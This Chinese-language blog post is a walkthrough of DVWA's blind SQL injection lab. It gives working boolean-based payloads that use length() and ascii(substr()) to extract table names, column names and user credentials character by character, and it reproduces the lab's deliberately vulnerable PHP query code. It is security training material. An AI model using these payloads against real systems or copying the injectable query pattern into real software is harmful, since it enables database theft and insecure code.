
<!DOCTYPE html>
<html lang="zh-CN" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>DVWA_SQL Injection(Blind) - Patrick</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="Fechin,"> 
    <meta name="description" content="我们生而破碎，用活着来修修补补,DVWA_SQL Injection(Blind)题解


SQL Injection(Blind)low与SQL Injection的不同其实就是在回显的内容不同，盲注回显的只有对与错，比如说并没,"> 
    <meta name="author" content="Patrick"> 
    <link rel="alternative" href="atom.xml" title="Patrick" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

    
<link rel="stylesheet" href="/css/diaspora.css">

<meta name="generator" content="Hexo 5.4.0"></head>

<body class="loading">
    <span id="config-title" style="display:none">Patrick</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="http://example.com"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">DVWA_SQL Injection(Blind)</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">DVWA_SQL Injection(Blind)</h1>
        <div class="stuff">
            <span>九月 20, 2021</span>
            
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/DVWA/" rel="tag">DVWA</a></li></ul>


        </div>
        <div class="content markdown">
            <p>DVWA_SQL Injection(Blind)题解</p>
<span id="more"></span>

<h1><span id="sql-injectionblind"><center>SQL Injection(Blind)</center></span></h1><h2><span id="low">low</span></h2><p>与SQL Injection的不同其实就是在回显的内容不同，盲注回显的只有对与错，比如说<br><img src="https://img11.360buyimg.com/ddimg/jfs/t1/209083/38/1419/3232/61483877E7eeccf8d/d96e97b210dff5d3.png" alt="1.png"><br><img src="https://img14.360buyimg.com/ddimg/jfs/t1/206851/14/1491/3495/61483877E6bb5d1d8/affe9c06f4b722b4.png" alt="2.png"><br>并没有回显具体的数据。但是可以通过返回的正确与否来判断语句是否被执行。<br>输入<code>1&#39;order by 2#</code>,正确回显，说明闭合方式有可能是<code>&#39;1&#39;</code>。与SQL Injection一样，判断出列数为2，因为是盲注，所以可以通过<code>database()</code>跳过数据库名的猜解。<br><code>1&#39; and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))&lt;10 # </code>可以通过二分法来推测表名的长度，猜出第一个表名长度为5，然后再通过ascii码来逐步猜测每个字母。<br><code>1&#39; and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=117 #</code><br>由此语句判断出表名第一位为：u，修改substr(x,2,1)，继续猜解表名,直到解出表名为：users，然后用相同方法猜解列名长度<br><code>1&#39; and length((select column_name from information_schema.columns where table_name=&#39;users&#39; limit 0,1))&lt;7 # </code><br><code>1&#39; and ascii(substr((select column_name from information_schema.columns where table_name=&#39;users&#39; limit 4,1),1,1))=117 # </code><br>得到列名首字母为u，逐字猜解得到第四个列名：user，通过修改limit 0,1参数继续猜解第五个列名为password，继续判断user列的第一个数据长度：<code>1&#39; and length((select user from dvwa.users limit 0,1))=5 #</code><br>判断出长度为5，猜解字符：<br><code>1&#39; and ascii(substr((select user from dvwa.users limit 0,1),1,1))=97 #</code><br>最后得到用户名为user，密码为password，列为md5加密形式。<br>源码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">if( isset( $_GET[ &#x27;Submit&#x27; ] ) ) &#123;</span><br><span class="line">    // Get input</span><br><span class="line">    $id = $_GET[ &#x27;id&#x27; ];</span><br><span class="line"></span><br><span class="line">    // Check database</span><br><span class="line">    $getid  = &quot;SELECT first_name, last_name FROM users WHERE user_id = &#x27;$id&#x27;;&quot;;</span><br><span class="line">    $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;],  $getid ); // Removed &#x27;or die&#x27; to suppress mysql errors</span><br><span class="line"></span><br><span class="line">    // Get results</span><br><span class="line">    $num = @mysqli_num_rows( $result ); // The &#x27;@&#x27; character suppresses errors</span><br><span class="line">    if( $num &gt; 0 ) &#123;</span><br><span class="line">        // Feedback for end user</span><br><span class="line">        echo &#x27;&lt;pre&gt;User ID exists in the database.&lt;/pre&gt;&#x27;;</span><br><span class="line">    &#125;</span><br><span class="line">    else &#123;</span><br><span class="line">        // User wasn&#x27;t found, so the page wasn&#x27;t!</span><br><span class="line">        header( $_SERVER[ &#x27;SERVER_PROTOCOL&#x27; ] . &#x27; 404 Not Found&#x27; );</span><br><span class="line"></span><br><span class="line">        // Feedback for end user</span><br><span class="line">        echo &#x27;&lt;pre&gt;User ID is MISSING from the database.&lt;/pre&gt;&#x27;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    ((is_null($___mysqli_res = mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]))) ? false : $___mysqli_res);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>
<p>可以看出在Get results部分，对数据库返回结果做出了限制，只输出固定的三句内容，以此判断从数据库中查询的内容是否为真。</p>
<h2><span id="medium">Medium</span></h2><p>具体解法参考low以及<a target="_blank" rel="noopener" href="http://47.115.205.232/2021/09/19/DVWA_SQL%20Injection/">上一篇</a></p>
<h2><span id="high">High</span></h2><p>具体解法参考low以及<a target="_blank" rel="noopener" href="http://47.115.205.232/2021/09/19/DVWA_SQL%20Injection/">上一篇</a></p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title='0' data-url='http://link.hhtjim.com/163/425570952.mp3'></li>
                        
                    
                        
                            <li title='1' data-url='http://link.hhtjim.com/163/425570952.mp3'></li>
                        
                    
                </ul>
            
        </div>
        
    <div id='gitalk-container' class="comment link"
		data-enable='true'
        data-ae='true'
        data-ci=''
        data-cs=''
        data-r=''
        data-o=''
        data-a=''
        data-d='false'
    >查看评论</div>


    </div>
    
        <div class='side'>
			<ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">1.</span> <span class="toc-text">SQL Injection(Blind)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link"><span class="toc-number">1.1.</span> <span class="toc-text">low</span></a></li><li class="toc-item toc-level-2"><a class="toc-link"><span class="toc-number">1.2.</span> <span class="toc-text">Medium</span></a></li><li class="toc-item toc-level-2"><a class="toc-link"><span class="toc-number">1.3.</span> <span class="toc-text">High</span></a></li></ol></li></ol>	
        </div>
    
</div>


    </div>
</div>
</body>

<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
